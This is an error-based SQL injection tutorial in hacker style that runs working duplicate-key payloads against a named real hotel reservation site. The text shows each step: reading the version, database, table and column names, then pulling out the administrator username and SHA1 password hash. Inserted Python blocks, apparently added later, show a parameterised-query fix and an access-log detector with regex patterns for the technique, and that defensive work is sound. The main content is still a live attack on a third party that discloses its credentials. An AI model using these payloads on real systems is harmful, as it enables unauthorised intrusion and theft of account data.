ERROR BASED SQL Injection Tutorial (For Noob To LEET) :

Quick Introduction :

A method of extracting information from a database when UNION SELECT does not work at all. It works by crafting a query that makes the database report the wanted value inside an error message. Error-based injection is used when two queries are executed on the same parameter, or when the injection point is after an ORDER BY clause.


Grabbing Version ::

http://samuivillaexclusive.com/reservations.php?id=1411 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1

Result : Duplicate entry '5.1.56-log:1' for key 'group_key'
Version is : 5.1.56-log
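The "Duplicate entry" result above only reaches the browser because the page pastes the id parameter straight into the SQL text and then echoes the database driver's error. The following is an added example (not code from the site or the tutorial's author) that puts the vulnerable pattern beside a hardened one: the parameter is validated, bound as data, and any driver error is logged server-side while the client gets a generic message. It uses Python's sqlite3 with a constructed reservations table, and a simplified payload that does not need MySQL-only functions; the names make_db, lookup_vulnerable and lookup_hardened are assumptions for this illustration.

```python
import logging
import re
import sqlite3

# Constructed sample data standing in for a reservations table; not the site's schema.
SEED_ROWS = [(1411, "Villa A"), (1412, "Villa B")]

# Constructed payload in the shape of the tutorial's first request, reduced to
# clauses SQLite understands (no concat_ws/version()/floor/rand in SQLite).
PAYLOAD = "1411 or 1 group by 1 having min(0) or 1"


def make_db():
    """Create an in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reservations (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO reservations VALUES (?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """'Before' pattern: the request parameter is concatenated into the SQL text,
    so everything after the number becomes part of the statement."""
    sql = "SELECT name FROM reservations WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, raw_id):
    """'After' pattern: check the parameter shape, bind it as data, and never
    return driver error text (such as MySQL's 'Duplicate entry ...') to the client."""
    if not re.fullmatch(r"\d{1,10}", raw_id):
        # Generic response; the rejected value can be logged for the defender.
        logging.warning("rejected non-numeric id parameter: %r", raw_id)
        return {"error": "invalid id"}
    try:
        rows = conn.execute(
            "SELECT name FROM reservations WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        # Full traceback goes to the server log only.
        logging.exception("database error while looking up reservation")
        return {"error": "temporary error"}
    return {"rows": [row[0] for row in rows]}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", lookup_vulnerable(db, "1411"))
    print("vulnerable, payload   :", lookup_vulnerable(db, PAYLOAD))
    print("hardened, normal id   :", lookup_hardened(db, "1411"))
    print("hardened, payload     :", lookup_hardened(db, PAYLOAD))
```

With the concatenated query the payload's "or 1 ... having ... or 1" turns a single-row lookup into a dump of every row; with the bound parameter the same input never reaches the SQL parser at all, so there is no error message to carry data out.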


Grabbing Database ::


http://samuivillaexclusive.com/reservations.php?id=1411 or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1

Result : Duplicate entry 'samuiexclusive:1' for key 'group_key'
Database is : samuiexclusive


Grabbing Tables ::


In XPath, error-based or duplicate-entry injection there is a page limit when injecting a site .. I think only 31 characters at a time .. so we can't grab all tables together with group concatenation or DIOS. So we use LIMIT to grab one table at a time.


http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) FROM information_schema.tables where table_schema=database() LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)

Result : Duplicate entry 'administrators~1' for key 'group_key'
First Table is : administrators

For getting the other tables, increase the LIMIT offset:
from LIMIT 0,1
to LIMIT 1,1 -- 2,1 -- 3,1 -- 4,1 -- 5,1

Limit 1,1

Result : Duplicate entry 'agent_auth~1' for key 'group_key'

Limit 2,1

Result : Duplicate entry 'blog_post_tags~1' for key 'group_key'

Limit 3,1

Result : Duplicate entry 'blog_posts~1' for key 'group_key'


Keep increasing the LIMIT offset to get the rest of the tables.
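Walking the tables one LIMIT offset at a time leaves a very recognisable trail in the web server's access log: the same client, the same parameter, a floor(rand(0)*2) group-by construct, information_schema references, and LIMIT n,1 with n counting upward, each answered with an error status. The following is an added example (not from the tutorial's author) of detection logic that scans such log lines for those indicators and summarises them per client. The log lines are constructed to mirror the requests shown above; the function names parse_line, classify, scan_log and summarize are assumptions for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not real traffic). The query strings follow the
# shape of the requests shown in the tutorial; IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2011:13:55:36 +0000] "GET /reservations.php?id=1411 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2011:13:55:41 +0000] "GET /reservations.php?id=1411%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201 HTTP/1.1" 500 612
203.0.113.7 - - [10/Oct/2011:13:56:02 +0000] "GET /reservations.php?id=1411%20and%20(select%201%20FROM%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20FROM%20information_schema.tables%20where%20table_schema=database()%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 640
203.0.113.7 - - [10/Oct/2011:13:56:09 +0000] "GET /reservations.php?id=1411%20and%20(select%201%20FROM%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20FROM%20information_schema.tables%20where%20table_schema=database()%20LIMIT%201,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 640
198.51.100.2 - - [10/Oct/2011:13:57:00 +0000] "GET /reservations.php?id=1412 HTTP/1.1" 200 5100
"""

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators of the duplicate-key error-based technique described on this page.
RAND_FLOOR = r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"
INDICATORS = {
    # floor(rand(0)*2) together with GROUP BY, in either order
    "dup_key_error_probe": re.compile(
        RAND_FLOOR + r".*group\s+by|group\s+by.*" + RAND_FLOOR, re.I | re.S
    ),
    "schema_enumeration": re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    # LIMIT n,1 : one row per request, offset walked upward
    "row_walk": re.compile(r"\blimit\s+(\d+)\s*,\s*1\b", re.I),
}


def parse_line(line):
    """Split one log line into fields; the query string is URL-decoded so that
    %20 / + encoded payloads match the indicator patterns."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": path,
        "query": unquote_plus(query),
        "status": int(m.group("status")),
    }


def classify(query):
    """Return the indicator names present in a decoded query string and the
    LIMIT offset if one was found (None otherwise)."""
    tags = [name for name in ("dup_key_error_probe", "schema_enumeration")
            if INDICATORS[name].search(query)]
    offset = None
    walk = INDICATORS["row_walk"].search(query)
    if walk:
        tags.append("row_walk")
        offset = int(walk.group(1))
    return tags, offset


def scan_log(text):
    """Return the parsed records that carry at least one indicator."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags, offset = classify(rec["query"])
        if tags:
            rec["tags"] = tags
            rec["limit_offset"] = offset
            findings.append(rec)
    return findings


def summarize(findings):
    """Aggregate findings per client: request count, indicator set, the LIMIT
    offsets walked, and how many requests drew a 5xx response."""
    per_ip = defaultdict(lambda: {"requests": 0, "tags": set(), "offsets": set(), "error_responses": 0})
    for rec in findings:
        entry = per_ip[rec["ip"]]
        entry["requests"] += 1
        entry["tags"].update(rec["tags"])
        if rec["limit_offset"] is not None:
            entry["offsets"].add(rec["limit_offset"])
        if rec["status"] >= 500:
            entry["error_responses"] += 1
    return dict(per_ip)


if __name__ == "__main__":
    for ip, info in summarize(scan_log(SAMPLE_LOG)).items():
        print(ip, info)
```

A single matching request is worth an alert on its own; the per-client summary is what distinguishes a one-off scanner hit from an extraction in progress, since a growing set of LIMIT offsets paired with error responses is exactly the row-by-row walk this section describes.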



Grabbing Columns :: (Table : administrators)

We use the CHAR or HEX value of the table name, same as in union-based injection ;)
and we will use LIMIT here too.


http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) FROM information_schema.columns where table_name=0x61646d696e6973747261746f7273 LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)


Result : Duplicate entry 'id~1' for key 'group_key'

First Column is : id


Increase the LIMIT offset to get all columns:
LIMIT 0,1 -- 1,1 -- 2,1 -- 3,1 -- 4,1

Limit 1,1

Result : Duplicate entry 'type~1' for key 'group_key'

Limit 2,1

Result : Duplicate entry 'username~1' for key 'group_key'

Limit 3,1

Result : Duplicate entry 'sha1_password~1' for key 'group_key'


Dumping Data Out Of Table (Table : administrators , Columns : username, sha1_password)


Dumping Column : Username
From Table : administrators

http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(username as char),0x7e)) FROM administrators LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)

Result : Duplicate entry 'admin~1' for key 'group_key'

Username is : admin


Dumping Column : sha1_password
From Table : administrators

http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(sha1_password as char),0x7e)) FROM administrators LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)


Result : Duplicate entry '1040deebf3e29be080e6a36b4d5638c1453e58b9~1' for key 'group_key'


This is the SHA1 password hash and it is not complete .. a SHA1 hash is 40 characters and the page limit is 31.
We will use the substr() function to get the remaining characters .. we will talk about it later ;)

Thanks for reading ..

Note : This is purely for sharing knowledge. We are not responsible for actions performed by you.


hAxOr -tr0jAn*